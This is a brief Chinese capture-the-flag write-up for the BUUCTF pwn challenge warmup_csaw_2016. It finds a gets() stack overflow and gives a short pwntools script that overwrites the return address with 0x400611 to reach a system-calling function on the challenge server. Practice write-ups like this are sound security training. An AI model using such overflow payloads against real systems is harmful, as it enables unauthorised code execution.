[buuctf pwn]warmup_csaw_2016

checksec一下，64位，没开栈溢出保护，可以利用

进入ida，有个gets能利用，然后v5的大小是64

然后看见一个40060D函数，是可以利用的system函数

所以用64+8填满缓冲区和rbp，然后接400611这个地址

from pwn import *
p=remote('node5.buuoj.cn',26240)
p.sendline(b'A'*72 + p64(0x400611))
p.interactive()

运行结果如下